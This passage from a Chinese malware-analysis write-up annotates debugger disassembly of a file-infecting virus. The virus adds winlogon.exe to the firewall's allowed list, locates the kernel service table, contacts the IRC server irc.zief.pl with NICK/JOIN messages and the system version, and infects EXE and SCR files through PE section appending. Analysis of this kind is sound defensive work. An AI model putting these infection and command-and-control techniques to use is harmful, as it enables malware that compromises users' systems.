7FF71B2B    51              push ecx                                     ; 获取硬件消息
7FF71B2C    FF95 88501B00   call dword ptr ss:[ebp+0x1B5088]             ; GetVolumeInformationA
7FF71B32    83BD 1C501B00 0>cmp dword ptr ss:[ebp+0x1B501C],0x0


[C++] 纯文本查看 复制代码
7FF71B6B    8DB5 62511B00   lea esi,dword ptr ss:[ebp+0x1B5162]
7FF71B71    68 C8000000     push 0xC8
7FF71B76    56              push esi
7FF71B77    6A 00           push 0x0                                     ; 获得当前进程名
7FF71B79    FF95 6C501B00   call dword ptr ss:[ebp+0x1B506C]             ; kernel32.GetModuleFileNameA



[C++] 纯文本查看 复制代码
7FF71B85    8DBD 2A521B00   lea edi,dword ptr ss:[ebp+0x1B522A]
7FF71B8B    56              push esi
7FF71B8C    52              push edx
7FF71B8D    57              push edi
7FF71B8E    FF95 20501B00   call dword ptr ss:[ebp+0x1B5020]
7FF71B94    83C4 0C         add esp,0xC
7FF71B97    8D95 6A271B00   lea edx,dword ptr ss:[ebp+0x1B276A]
7FF71B9D    50              push eax
7FF71B9E    57              push edi
7FF71B9F    6A 01           push 0x1
7FF71BA1    56              push esi
7FF71BA2    52              push edx
7FF71BA3    68 02000080     push 0x80000002
7FF71BA8    FFD3            call ebx                                     ; SHSetValueA


这里修改注册表
参数为
[C++] 纯文本查看 复制代码
01EDFF9C   80000002
01EDFFA0   7FF7176A  ASCII "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List"
01EDFFA4   7FF74162  ASCII "\??\C:\WINDOWS\system32\winlogon.exe"
01EDFFA8   00000001
01EDFFAC   7FF7422A  ASCII "\??\C:\WINDOWS\system32\winlogon.exe:*:enabled:@shell32.dll,-1"
01EDFFB0   0000003E
\C:\WINDOWS\system32\winlogon.exe" //这个为当前进程的文件路径

[C++] 纯文本查看 复制代码
7FF71548    8D95 96541B00   lea edx,dword ptr ss:[ebp+0x1B5496]      ; .\WINDOWS\system32\ntkrnlpa.exe
7FF7154E    54              push esp
7FF7154F    6A 06           push 0x6
7FF71551    52              push edx
7FF71552    FF95 F4501B00   call dword ptr ss:[ebp+0x1B50F4]         ; ZwOpenSection
7FF71558    8B7424 08       mov esi,dword ptr ss:[esp+0x8]
7FF7155C    83C4 18         add esp,0x18
7FF7155F    85C0            test eax,eax
7FF71561    0F85 E5010000   jnz 7FF7174C
7FF71567    6A 00           push 0x0
7FF71569    68 20010000     push 0x120
7FF7156E    56              push esi
7FF7156F    6A 0B           push 0xB
7FF71571    FF95 04511B00   call dword ptr ss:[ebp+0x1B5104]         ; ZwQuerySystemInformation
7FF71577    8B5E 0C         mov ebx,dword ptr ds:[esi+0xC]
7FF7157A    8B4E 10         mov ecx,dword ptr ds:[esi+0x10]
7FF7157D    899D 9E541B00   mov dword ptr ss:[ebp+0x1B549E],ebx
7FF71583    898D A2541B00   mov dword ptr ss:[ebp+0x1B54A2],ecx
7FF71589    81E3 00F0FF0F   and ebx,0xFFFF000
7FF7158F    51              push ecx
7FF71590    53              push ebx
7FF71591    6A 00           push 0x0
7FF71593    6A 06           push 0x6
7FF71595    FFB5 96541B00   push dword ptr ss:[ebp+0x1B5496]
7FF7159B    FF95 98501B00   call dword ptr ss:[ebp+0x1B5098]         ; MapViewOfFile影射到内存
7FF715A1    50              push eax
7FF715A2    FFB5 96541B00   push dword ptr ss:[ebp+0x1B5496]
7FF715A8    FF95 04501B00   call dword ptr ss:[ebp+0x1B5004]         ; CloseHandle
7FF715AE    58              pop eax
7FF715AF    85C0            test eax,eax
7FF715B1    93              xchg eax,ebx
7FF715B2    0F84 94010000   je 7FF7174C
7FF715B8    66:813B 4D5A    cmp word ptr ds:[ebx],0x5A4D             ; 检测dos头
7FF715BD    74 0C           je short 7FF715CB
7FF715BF    53              push ebx
7FF715C0    FF95 C4501B00   call dword ptr ss:[ebp+0x1B50C4]
7FF715C6    E9 81010000     jmp 7FF7174C
7FF715CB    8DBE C8000000   lea edi,dword ptr ds:[esi+0xC8]
7FF715D1    0FB74E 1E       movzx ecx,word ptr ds:[esi+0x1E]
7FF715D5    8D7431 1F       lea esi,dword ptr ds:[ecx+esi+0x1F]
7FF715D9    68 04010000     push 0x104
7FF715DE    57              push edi
7FF715DF    FF95 70501B00   call dword ptr ss:[ebp+0x1B5070]         ; GetSysteDirectoryA
7FF715E5    56              push esi
7FF715E6    57              push edi
7FF715E7    FF95 28501B00   call dword ptr ss:[ebp+0x1B5028]         ; 连接字符串
7FF715ED    8B43 3C         mov eax,dword ptr ds:[ebx+0x3C]
7FF715F0    03C3            add eax,ebx                              ;  "C:\WINDOWS\system32\ntkrnlpa.exe"
7FF715F2    8B50 78         mov edx,dword ptr ds:[eax+0x78]
7FF715F5    03D3            add edx,ebx
7FF715F7    8B72 20         mov esi,dword ptr ds:[edx+0x20]
7FF715FA    8B4A 18         mov ecx,dword ptr ds:[edx+0x18]
7FF715FD    8D3433          lea esi,dword ptr ds:[ebx+esi]
7FF71600    51              push ecx
7FF71601    AD              lods dword ptr ds:[esi]
7FF71602    03C3            add eax,ebx
7FF71604    8178 01 6553657>cmp dword ptr ds:[eax+0x1],0x72655365    ; eSerC找这个特征字符
7FF7160B    74 05           je short 7FF71612
7FF7160D  ^ E2 F2           loopd short 7FF71601
7FF7160F    59              pop ecx
7FF71610  ^ EB AD           jmp short 7FF715BF
7FF71612    290C24          sub dword ptr ss:[esp],ecx               ;  KeServiceDescriptorTable
7FF71615    8B72 24         mov esi,dword ptr ds:[edx+0x24]          ; 最后找到的是这个
7FF71618    59              pop ecx
7FF71619    03F3            add esi,ebx
7FF7161B    8B52 1C         mov edx,dword ptr ds:[edx+0x1C]
7FF7161E    0FB7044E        movzx eax,word ptr ds:[esi+ecx*2]
7FF71622    03D3            add edx,ebx
7FF71624    8B3482          mov esi,dword ptr ds:[edx+eax*4]
7FF71627    03F3            add esi,ebx
7FF71629    8B4E 08         mov ecx,dword ptr ds:[esi+0x8]
7FF7162C    89B5 A6541B00   mov dword ptr ss:[ebp+0x1B54A6],esi
7FF71632    8B36            mov esi,dword ptr ds:[esi]
7FF71634    3BB5 9E541B00   cmp esi,dword ptr ss:[ebp+0x1B549E]
7FF7163A  ^ 72 83           jb short 7FF715BF
7FF7163C    2BB5 9E541B00   sub esi,dword ptr ss:[ebp+0x1B549E]
7FF71642    3BB5 A2541B00   cmp esi,dword ptr ss:[ebp+0x1B54A2]
7FF71648  ^ 0F83 71FFFFFF   jnb 7FF715BF
7FF7164E    33C0            xor eax,eax
7FF71650    89B5 AA541B00   mov dword ptr ss:[ebp+0x1B54AA],esi
7FF71656    898D AE541B00   mov dword ptr ss:[ebp+0x1B54AE],ecx
7FF7165C    50              push eax
7FF7165D    50              push eax
7FF7165E    6A 03           push 0x3
7FF71660    50              push eax
7FF71661    6A 01           push 0x1
7FF71663    68 00000080     push 0x80000000
7FF71668    57              push edi
7FF71669    FF85 2C161B00   inc dword ptr ss:[ebp+0x1B162C]
7FF7166F    FF95 40501B00   call dword ptr ss:[ebp+0x1B5040]         ; CreateFileA
7FF71675    FF8D 2C161B00   dec dword ptr ss:[ebp+0x1B162C]
7FF7167B    83F8 FF         cmp eax,-0x1
7FF7167E  ^ 0F84 3BFFFFFF   je 7FF715BF
7FF71684    8985 96541B00   mov dword ptr ss:[ebp+0x1B5496],eax
7FF7168A    8B43 3C         mov eax,dword ptr ds:[ebx+0x3C]
7FF7168D    03C3            add eax,ebx
7FF7168F    0FB750 14       movzx edx,word ptr ds:[eax+0x14]
7FF71693    0FB748 06       movzx ecx,word ptr ds:[eax+0x6]
7FF71697    8D4402 18       lea eax,dword ptr ds:[edx+eax+0x18]
7FF7169B    8B50 0C         mov edx,dword ptr ds:[eax+0xC]
7FF7169E    3BD6            cmp edx,esi
7FF716A0    77 07           ja short 7FF716A9
7FF716A2    0350 10         add edx,dword ptr ds:[eax+0x10]
7FF716A5    3BD6            cmp edx,esi
7FF716A7    77 16           ja short 7FF716BF
7FF716A9    83C0 28         add eax,0x28
7FF716AC  ^ E2 ED           loopd short 7FF7169B
7FF716AE    FFB5 96541B00   push dword ptr ss:[ebp+0x1B5496]
7FF716B4    FF95 04501B00   call dword ptr ss:[ebp+0x1B5004]
7FF716BA  ^ E9 00FFFFFF     jmp 7FF715BF
7FF716BF    2B70 0C         sub esi,dword ptr ds:[eax+0xC]
7FF716C2    6A 00           push 0x0
7FF716C4    0370 14         add esi,dword ptr ds:[eax+0x14]
7FF716C7    6A 00           push 0x0
7FF716C9    56              push esi
7FF716CA    FFB5 96541B00   push dword ptr ss:[ebp+0x1B5496]
7FF716D0    FF95 B4501B00   call dword ptr ss:[ebp+0x1B50B4]         ; SetFilePointer
7FF716D6    8B85 AE541B00   mov eax,dword ptr ss:[ebp+0x1B54AE]
7FF716DC    C1E0 02         shl eax,0x2
7FF716DF    50              push eax
7FF716E0    50              push eax
7FF716E1    6A 00           push 0x0
7FF716E3    FF95 90501B00   call dword ptr ss:[ebp+0x1B5090]         ; GlobalAlloc
7FF716E9    8985 9A541B00   mov dword ptr ss:[ebp+0x1B549A],eax
7FF716EF    8BD4            mov edx,esp
7FF716F1    6A 00           push 0x0
7FF716F3    52              push edx
7FF716F4    FF32            push dword ptr ds:[edx]
7FF716F6    50              push eax
7FF716F7    FFB5 96541B00   push dword ptr ss:[ebp+0x1B5496]
7FF716FD    FF95 A8501B00   call dword ptr ss:[ebp+0x1B50A8]         ; ReadFile
7FF71703    8B85 96541B00   mov eax,dword ptr ss:[ebp+0x1B5496]
7FF71709    890424          mov dword ptr ss:[esp],eax
7FF7170C    FF95 04501B00   call dword ptr ss:[ebp+0x1B5004]         ; 关闭句柄
7FF71712    8B53 3C         mov edx,dword ptr ds:[ebx+0x3C]
7FF71715    8BB5 9A541B00   mov esi,dword ptr ss:[ebp+0x1B549A]
7FF7171B    8B541A 34       mov edx,dword ptr ds:[edx+ebx+0x34]
7FF7171F    8BFE            mov edi,esi
7FF71721    2B95 9E541B00   sub edx,dword ptr ss:[ebp+0x1B549E]
7FF71727    8B8D AE541B00   mov ecx,dword ptr ss:[ebp+0x1B54AE]
7FF7172D    AD              lods dword ptr ds:[esi]
7FF7172E    2BC2            sub eax,edx
7FF71730    AB              stos dword ptr es:[edi]
7FF71731  ^ E2 FA           loopd short 7FF7172D                     ; 这里是重设SSDT?
7FF71733    8D85 AF241B00   lea eax,dword ptr ss:[ebp+0x1B24AF]


关于内核方面的东西是我的了解的不是很多。。这里有点迷糊。
[C++] 纯文本查看 复制代码
7FF71BD3    8DBD 10511B00   lea edi,dword ptr ss:[ebp+0x1B5110]
7FF71BD9    E8 4AF1FFFF     call 7FF70D28                            ; 填充关于网络的函数
7FF71BDE    E8 0C000000     call 7FF71BEF


7FF74110  71A26A55  ws2_32.WSAStartup
7FF74114  71A23E2B  ws2_32.closesocket
7FF74118  71A24A07  ws2_32.connect
7FF7411C  71A25355  ws2_32.gethostbyname
7FF74120  71A42E70  wsock32.recv
7FF74124  71A24C27  ws2_32.send
7FF74128  71A24211  ws2_32.socket

填写了这些api想想就知道要下载东西了。
[C++] 纯文本查看 复制代码
7FF71C0A    8DBD 2C511B00   lea edi,dword ptr ss:[ebp+0x1B512C]
7FF71C10    E8 13F1FFFF     call 7FF70D28
7FF71C15    83BD 30511B00 0>cmp dword ptr ss:[ebp+0x1B5130],0x0


再次填充
7FF7412C  76694D8C  wininet.InternetCloseHandle
7FF74130  766A5C4E  wininet.InternetGetConnectedState
7FF74134  7669578E  wininet.InternetOpenA
7FF74138  76695A5A  wininet.InternetOpenUrlA
7FF7413C  766982EA  wininet.InternetReadFile
[C++] 纯文本查看 复制代码
7FF71C03    8DB5 381F1B00   lea esi,dword ptr ss:[ebp+0x1B1F38]
7FF71C09    59              pop ecx
7FF71C0A    8DBD 2C511B00   lea edi,dword ptr ss:[ebp+0x1B512C]
7FF71C10    E8 13F1FFFF     call 7FF70D28
7FF71C15    83BD 30511B00 0>cmp dword ptr ss:[ebp+0x1B5130],0x0
7FF71C1C    0F84 4C020000   je 7FF71E6E
7FF71C22    81EC 90010000   sub esp,0x190
7FF71C28    54              push esp
7FF71C29    68 01010000     push 0x101
7FF71C2E    FF95 10511B00   call dword ptr ss:[ebp+0x1B5110]         ;  WSAStartup
7FF71C34    81C4 90010000   add esp,0x190
7FF71C3A    50              push eax
7FF71C3B    8BD4            mov edx,esp
7FF71C3D    6A 00           push 0x0
7FF71C3F    52              push edx
7FF71C40    FF95 30511B00   call dword ptr ss:[ebp+0x1B5130]         ; IntetnetGetConnectedState
7FF71C46    85C0            test eax,eax
7FF71C48    59              pop ecx
7FF71C49    75 0D           jnz short 7FF71C58
7FF71C4B    68 88130000     push 0x1388
7FF71C50    FF95 C0501B00   call dword ptr ss:[ebp+0x1B50C0]         ; sleep
7FF71C56  ^ EB E2           jmp short 7FF71C3A                       ; 不断查询网络状态
7FF71C58    66:C785 1F281B0>mov word ptr ss:[ebp+0x1B281F],0x5000
7FF71C61    83A5 21281B00 0>and dword ptr ss:[ebp+0x1B2821],0x0
7FF71C68    8DBD 25281B00   lea edi,dword ptr ss:[ebp+0x1B2825]
7FF71C6E    57              push edi
7FF71C6F    FF95 1C511B00   call dword ptr ss:[ebp+0x1B511C]         ; gethostbyname
7FF71C75    85C0            test eax,eax                             ; irc.zief.pl
7FF71C77    75 24           jnz short 7FF71C9D                       ; 开始解析ip了
7FF71C79    57              push edi
7FF71C7A    FF95 38501B00   call dword ptr ss:[ebp+0x1B5038]
7FF71C80    8D7C38 01       lea edi,dword ptr ds:[eax+edi+0x1]
7FF71C84    803F 00         cmp byte ptr ds:[edi],0x0
7FF71C87  ^ 75 E5           jnz short 7FF71C6E
7FF71C89    E8 11FCFFFF     call 7FF7189F
7FF71C8E    83BD 21281B00 0>cmp dword ptr ss:[ebp+0x1B2821],0x0
7FF71C95    0F84 BA010000   je 7FF71E55
7FF71C9B    EB 0D           jmp short 7FF71CAA
7FF71C9D    8B40 0C         mov eax,dword ptr ds:[eax+0xC]
7FF71CA0    8B00            mov eax,dword ptr ds:[eax]
7FF71CA2    FF30            push dword ptr ds:[eax]
7FF71CA4    8F85 21281B00   pop dword ptr ss:[ebp+0x1B2821]
7FF71CAA    6A 00           push 0x0
7FF71CAC    6A 01           push 0x1
7FF71CAE    6A 02           push 0x2
7FF71CB0    FF95 28511B00   call dword ptr ss:[ebp+0x1B5128]         ; socket
7FF71CB6    83F8 FF         cmp eax,-0x1                             ; 建立套接字
7FF71CB9    0F84 96010000   je 7FF71E55
7FF71CBF    93              xchg eax,ebx
7FF71CC0    8D95 1D281B00   lea edx,dword ptr ss:[ebp+0x1B281D]
7FF71CC6    6A 10           push 0x10
7FF71CC8    52              push edx
7FF71CC9    53              push ebx
7FF71CCA    FF95 18511B00   call dword ptr ss:[ebp+0x1B5118]         ; connect
7FF71CD0    85C0            test eax,eax
7FF71CD2    0F85 76010000   jnz 7FF71E4E
7FF71CD8    8DBD 6A281B00   lea edi,dword ptr ss:[ebp+0x1B286A]
7FF71CDE    B1 08           mov cl,0x8
7FF71CE0    E8 57F5FFFF     call 7FF7123C
7FF71CE5    68 94000000     push 0x94
7FF71CEA    5E              pop esi
7FF71CEB    2BE6            sub esp,esi
7FF71CED    893424          mov dword ptr ss:[esp],esi
7FF71CF0    54              push esp
7FF71CF1    FF95 84501B00   call dword ptr ss:[ebp+0x1B5084]         ; GetVersionExA
7FF71CF7    8DBD 78281B00   lea edi,dword ptr ss:[ebp+0x1B2878]
7FF71CFD    B1 01           mov cl,0x1
7FF71CFF    E8 38F5FFFF     call 7FF7123C
7FF71D04    8D95 65281B00   lea edx,dword ptr ss:[ebp+0x1B2865]
7FF71D0A    6A 00           push 0x0
7FF71D0C    68 14000000     push 0x14
7FF71D11    52              push edx
7FF71D12    53              push ebx
7FF71D13    FF95 24511B00   call dword ptr ss:[ebp+0x1B5124]         ; send


发送的是
7FF71865  4E 49 43 4B 20 70 6E 71 79 65 61 65 6B 0A 55 53  NICK pnqyeaek.US
7FF71875  45 52 20                                         ER
看起来像用户名密码,应是个FPT连接
[C++] 纯文本查看 复制代码
7FF71D72    57              push edi
7FF71D73    FF95 20501B00   call dword ptr ss:[ebp+0x1B5020]
7FF71D79    81C4 B0000000   add esp,0xB0
7FF71D7F    6A 00           push 0x0
7FF71D81    50              push eax
7FF71D82    57              push edi
7FF71D83    53              push ebx
7FF71D84    FF95 24511B00   call dword ptr ss:[ebp+0x1B5124]         ; ws2_32.send
7FF71D8A    8B8D 1C161B00   mov ecx,dword ptr ss:[ebp+0x1B161C]


7FF74162  30 32 30 35 30 31 20 2E 20 2E 20 3A 23 64 63 31  020501 . . :#dc1
7FF74172  62 32 30 32 39 30 20 53 65 72 76 69 63 65 20 50  b20290 Service P
7FF74182  61 63 6B 20 33 0A 4A 4F 49 4E 20 00 5C 00 69 00  ack 3.JOIN .\.i.
7FF74192  64 00 62 00 74 00 56 00 74                       d.b.t.V.t

发送系统版本
[C++] 纯文本查看 复制代码
7FF71DC3    8DB5 62511B00   lea esi,dword ptr ss:[ebp+0x1B5162]
7FF71DC9    8D8D 61531B00   lea ecx,dword ptr ss:[ebp+0x1B5361]
7FF71DCF    2BCE            sub ecx,esi
7FF71DD1    6A 00           push 0x0
7FF71DD3    51              push ecx
7FF71DD4    56              push esi
7FF71DD5    53              push ebx
7FF71DD6    FF95 20511B00   call dword ptr ss:[ebp+0x1B5120]         ; recv
7FF71DDC    83F8 00         cmp eax,0x0
7FF71DDF    7E 6D           jle short 7FF71E4E
7FF71DE1    91              xchg eax,ecx


然后就开始循环了
----------------------------------------------------我又是分割线------------------------------------------------------------------------------------------------------------------------------------
下面就是感染部分。
用od加载explorer再被hook的ZwOpenFile处设置好断点
[C++] 纯文本查看 复制代码
7FF82792    C685 61531B00 0>mov byte ptr ss:[ebp+0x1B5361],0x0
7FF82799    3D 45584500     cmp eax,0x455845                                    ; EXE
7FF8279E    74 0C           je short 7FF827AC
7FF827A0    3D 53435200     cmp eax,0x524353                                    ; SCR
7FF827A5    74 05           je short 7FF827AC
7FF827A7  ^ E9 C2F9FFFF     jmp 7FF8216E
7FF827AC    8B03            mov eax,dword ptr ds:[ebx]
7FF827AE    3D 57494E43     cmp eax,0x434E4957                                  ; WINC
7FF827B3  ^ 74 F2           je short 7FF827A7
7FF827B5    3D 5743554E     cmp eax,0x4E554357                                  ; WCUN
7FF827BA  ^ 74 EB           je short 7FF827A7
7FF827BC    3D 57433332     cmp eax,0x32334357                                  ; WC32
7FF827C1  ^ 74 E4           je short 7FF827A7
7FF827C3    3D 4F545350     cmp eax,0x5053544F                                  ; OTSP
7FF827C8  ^ 74 DD           je short 7FF827A7


这里有个扩展名过滤只感染EXE和SCR
并对文件开头进行了过滤
[C++] 纯文本查看 复制代码
7FF81FE3    8DB5 62531B00   lea esi,dword ptr ss:[ebp+0x1B5362]
7FF81FE9    85DB            test ebx,ebx
7FF81FEB    74 25           je short 7FF82012
7FF81FED    56              push esi
7FF81FEE    FF95 60501B00   call dword ptr ss:[ebp+0x1B5060]                    ; GetFileAttributesA
7FF81FF4    83F8 FF         cmp eax,-0x1
7FF81FF7    74 19           je short 7FF82012
7FF81FF9    8985 66541B00   mov dword ptr ss:[ebp+0x1B5466],eax
7FF81FFF    6A 00           push 0x0
7FF82001    56              push esi
7FF82002    FF95 B0501B00   call dword ptr ss:[ebp+0x1B50B0]                    ; SetFileAttributesA
7FF82008    85C0            test eax,eax
7FF8200A    74 06           je short 7FF82012
7FF8200C    FE85 06551B00   inc byte ptr ss:[ebp+0x1B5506]
7FF82012    2BC0            sub eax,eax
7FF82014    50              push eax
7FF82015    50              push eax
7FF82016    6A 03           push 0x3
7FF82018    50              push eax
7FF82019    0BDB            or ebx,ebx
7FF8201B    75 12           jnz short 7FF8202F
7FF8201D    83BD 1C501B00 0>cmp dword ptr ss:[ebp+0x1B501C],0x0
7FF82024    75 09           jnz short 7FF8202F
7FF82026    6A 03           push 0x3
7FF82028    68 00000080     push 0x80000000
7FF8202D    EB 07           jmp short 7FF82036
7FF8202F    6A 01           push 0x1
7FF82031    68 000000C0     push 0xC0000000
7FF82036    56              push esi
7FF82037    FF95 40501B00   call dword ptr ss:[ebp+0x1B5040]                    ; CreateFileA
7FF8203D    83F8 FF         cmp eax,-0x1
7FF82040    0F84 A2130000   je 7FF833E8
7FF82046    8985 6A541B00   mov dword ptr ss:[ebp+0x1B546A],eax
7FF8204C    85DB            test ebx,ebx
7FF8204E    74 21           je short 7FF82071
7FF82050    8D8D 6E541B00   lea ecx,dword ptr ss:[ebp+0x1B546E]
7FF82056    8D95 76541B00   lea edx,dword ptr ss:[ebp+0x1B5476]
7FF8205C    51              push ecx
7FF8205D    52              push edx
7FF8205E    6A 00           push 0x0
7FF82060    50              push eax
7FF82061    FF95 68501B00   call dword ptr ss:[ebp+0x1B5068]
7FF82067    85C0            test eax,eax
7FF82069    74 06           je short 7FF82071
7FF8206B    FE85 07551B00   inc byte ptr ss:[ebp+0x1B5507]
7FF82071    6A 00           push 0x0
7FF82073    FFB5 6A541B00   push dword ptr ss:[ebp+0x1B546A]
7FF82079    FF95 64501B00   call dword ptr ss:[ebp+0x1B5064]                    ; 获取文件大小
7FF8207F    83F8 FF         cmp eax,-0x1
7FF82082    0F84 1C130000   je 7FF833A4
7FF82088    8985 7E541B00   mov dword ptr ss:[ebp+0x1B547E],eax
7FF8208E    33C9            xor ecx,ecx
7FF82090    03C3            add eax,ebx
7FF82092    51              push ecx
7FF82093    50              push eax
7FF82094    51              push ecx
7FF82095    0BDB            or ebx,ebx
7FF82097    75 09           jnz short 7FF820A2
7FF82099    83BD 1C501B00 0>cmp dword ptr ss:[ebp+0x1B501C],0x0
7FF820A0    74 04           je short 7FF820A6
7FF820A2    6A 04           push 0x4
7FF820A4    EB 02           jmp short 7FF820A8
7FF820A6    6A 02           push 0x2
7FF820A8    51              push ecx
7FF820A9    FFB5 6A541B00   push dword ptr ss:[ebp+0x1B546A]
7FF820AF    FF95 44501B00   call dword ptr ss:[ebp+0x1B5044]                    ; CreateFileMappingA
7FF820B5    85C0            test eax,eax
7FF820B7    0F84 E7120000   je 7FF833A4
7FF820BD    33C9            xor ecx,ecx
7FF820BF    8985 82541B00   mov dword ptr ss:[ebp+0x1B5482],eax
7FF820C5    51              push ecx
7FF820C6    51              push ecx
7FF820C7    51              push ecx
7FF820C8    85DB            test ebx,ebx
7FF820CA    0BDB            or ebx,ebx
7FF820CC    75 09           jnz short 7FF820D7
7FF820CE    83BD 1C501B00 0>cmp dword ptr ss:[ebp+0x1B501C],0x0
7FF820D5    74 07           je short 7FF820DE
7FF820D7    68 1F000F00     push 0xF001F
7FF820DC    EB 05           jmp short 7FF820E3
7FF820DE    68 1D000F00     push 0xF001D
7FF820E3    50              push eax
7FF820E4    FF95 98501B00   call dword ptr ss:[ebp+0x1B5098]                    ; MapViewOfFile
7FF820EA    85C0            test eax,eax
7FF820EC    0F84 81120000   je 7FF83373


建立文件内存映射
[C++] 纯文本查看 复制代码
7FF8281C    8BB5 86541B00   mov esi,dword ptr ss:[ebp+0x1B5486]
7FF82822    66:813E 4D5A    cmp word ptr ds:[esi],0x5A4D                        ; 检测dos头
7FF82827    0F85 240B0000   jnz 7FF83351
7FF8282D    8B5E 3C         mov ebx,dword ptr ds:[esi+0x3C]
7FF82830    81FB FFFF0000   cmp ebx,0xFFFF
7FF82836    0F87 150B0000   ja 7FF83351
7FF8283C    03DE            add ebx,esi
7FF8283E    66:813B 5045    cmp word ptr ds:[ebx],0x4550                        ; 检测pe头
7FF82843    0F85 080B0000   jnz 7FF83351
7FF82849    F743 16 0020000>test dword ptr ds:[ebx+0x16],0x2000                 ; Characteristics
7FF82850    0F85 FB0A0000   jnz 7FF83351
7FF82856    F643 5C 02      test byte ptr ds:[ebx+0x5C],0x2                     ; SubSystem
7FF8285A    0F84 F10A0000   je 7FF83351
7FF82860    8B85 81421B00   mov eax,dword ptr ss:[ebp+0x1B4281]
7FF82131    0FB74B 06       movzx ecx,word ptr ds:[ebx+0x6]                     ; 获取节的数目
7FF82135    F9              stc
7FF82136    E3 36           jecxz short 7FF8216E
7FF82138    8D53 18         lea edx,dword ptr ds:[ebx+0x18]
7FF8213B    0FB743 14       movzx eax,word ptr ds:[ebx+0x14]
7FF8213F    03D0            add edx,eax                                         ; 定位到节头
7FF82141    49              dec ecx
7FF82142    6BC1 28         imul eax,ecx,0x28                                   ; 节的头大小
7FF82145    03D0            add edx,eax
7FF82147    813A 5F77696E   cmp dword ptr ds:[edx],0x6E69775F                   ; 算出最后一个节头
7FF8214D    F9              stc                                                 ; _win
7FF8214E    74 1E           je short 7FF8216E                                   ; 比较是不是_win
7FF82150    49              dec ecx
7FF82151    837A 0C 01      cmp dword ptr ds:[edx+0xC],0x1
7FF82155  ^ 72 DF           jb short 7FF82136
7FF82157    8B4B 3C         mov ecx,dword ptr ds:[ebx+0x3C]                     ; 文件对齐
7FF8215A    8B42 14         mov eax,dword ptr ds:[edx+0x14]                     ; 物理偏移
7FF8215D    0342 10         add eax,dword ptr ds:[edx+0x10]                     ; RawSize
7FF82160    8D4448 FF       lea eax,dword ptr ds:[eax+ecx*2-0x1]
7FF82164    F7D9            neg ecx
7FF82166    23C1            and eax,ecx                                         ; 加上一个对齐大小

7FF82874   /0F82 D70A0000   jb 7FF83351
7FF8287A   |8B42 08         mov eax,dword ptr ds:[edx+0x8]                      ; 虚拟地址
7FF8287D   |2B42 10         sub eax,dword ptr ds:[edx+0x10]                     ; RawSize
7FF82880   |73 02           jnb short 7FF82884
7FF82882   |33C0            xor eax,eax
7FF82884   |8985 8E541B00   mov dword ptr ss:[ebp+0x1B548E],eax
7FF8288A   |C785 1C1B1B00 E>mov dword ptr ss:[ebp+0x1B1B1C],0x43EC

7FF820F9    8B85 1C1B1B00   mov eax,dword ptr ss:[ebp+0x1B1B1C]
7FF820FF    8B4B 38         mov ecx,dword ptr ds:[ebx+0x38]                     ; SectionAlignment
7FF82102    05 E4060000     add eax,0x6E4
7FF82107    33D2            xor edx,edx
7FF82109    8D4401 FF       lea eax,dword ptr ds:[ecx+eax-0x1]
7FF8210D    F7F1            div ecx
7FF8210F    F7E1            mul ecx                                             ; 算要几个对齐
7FF82111    8985 92541B00   mov dword ptr ss:[ebp+0x1B5492],eax                 ; 保存最终大小
7FF82117    8B4B 3C         mov ecx,dword ptr ds:[ebx+0x3C]
7FF8211A    8B85 1C1B1B00   mov eax,dword ptr ss:[ebp+0x1B1B1C]
7FF82120    33D2            xor edx,edx
7FF82122    8D4401 FF       lea eax,dword ptr ds:[ecx+eax-0x1]
7FF82126    F7F1            div ecx
7FF82128    F7E1            mul ecx
7FF8212A    8985 8A541B00   mov dword ptr ss:[ebp+0x1B548A],eax                 ; 保存最终大小
7FF82130    C3              retn

7FF8335A    83BD 6A541B00 0>cmp dword ptr ss:[ebp+0x1B546A],0x0
7FF83361    0F84 9D000000   je 7FF83404
7FF83367    FFB5 86541B00   push dword ptr ss:[ebp+0x1B5486]
7FF8336D    FF95 C4501B00   call dword ptr ss:[ebp+0x1B50C4]                    ; UnmapViewOfFile
7FF83373    FFB5 82541B00   push dword ptr ss:[ebp+0x1B5482]
7FF83379    FF95 04501B00   call dword ptr ss:[ebp+0x1B5004]                    ; 关闭句柄
7FF8337F    80BD 07551B00 0>cmp byte ptr ss:[ebp+0x1B5507],0x0
7FF83386    74 1C           je short 7FF833A4
7FF83388    8D8D 6E541B00   lea ecx,dword ptr ss:[ebp+0x1B546E]


这里获取了一些必要参数并且算出需要的新大小,关闭句柄
[C++] 纯文本查看 复制代码
7FF81FE9    85DB            test ebx,ebx
7FF81FEB    74 25           je short 7FF82012
7FF81FED    56              push esi
7FF81FEE    FF95 60501B00   call dword ptr ss:[ebp+0x1B5060]                    ; GetFileAttributesA
7FF81FF4    83F8 FF         cmp eax,-0x1
7FF81FF7    74 19           je short 7FF82012
7FF81FF9    8985 66541B00   mov dword ptr ss:[ebp+0x1B5466],eax
7FF81FFF    6A 00           push 0x0
7FF82001    56              push esi
7FF82002    FF95 B0501B00   call dword ptr ss:[ebp+0x1B50B0]                    ; SetFileAttributesA
7FF82008    85C0            test eax,eax
7FF8200A    74 06           je short 7FF82012
7FF8200C    FE85 06551B00   inc byte ptr ss:[ebp+0x1B5506]
7FF82012    2BC0            sub eax,eax
7FF82014    50              push eax
7FF82015    50              push eax
7FF82016    6A 03           push 0x3
7FF82018    50              push eax
7FF82019    0BDB            or ebx,ebx


查询和设置文件属性
[C++] 纯文本查看 复制代码
7FF8201B   /75 12           jnz short 7FF8202F
7FF8201D   |83BD 1C501B00 0>cmp dword ptr ss:[ebp+0x1B501C],0x0
7FF82024   |75 09           jnz short 7FF8202F
7FF82026   |6A 03           push 0x3
7FF82028   |68 00000080     push 0x80000000
7FF8202D   |EB 07           jmp short 7FF82036
7FF8202F   \6A 01           push 0x1
7FF82031    68 000000C0     push 0xC0000000
7FF82036    56              push esi
7FF82037    FF95 40501B00   call dword ptr ss:[ebp+0x1B5040]                    ; CreateFileA
7FF8203D    83F8 FF         cmp eax,-0x1
7FF82040    0F84 A2130000   je 7FF833E8
7FF82046    8985 6A541B00   mov dword ptr ss:[ebp+0x1B546A],eax
7FF8204C    85DB            test ebx,ebx
7FF8204E    74 21           je short 7FF82071
7FF82050    8D8D 6E541B00   lea ecx,dword ptr ss:[ebp+0x1B546E]
7FF82056    8D95 76541B00   lea edx,dword ptr ss:[ebp+0x1B5476]
7FF8205C    51              push ecx
7FF8205D    52              push edx
7FF8205E    6A 00           push 0x0
7FF82060    50              push eax
7FF82061    FF95 68501B00   call dword ptr ss:[ebp+0x1B5068]
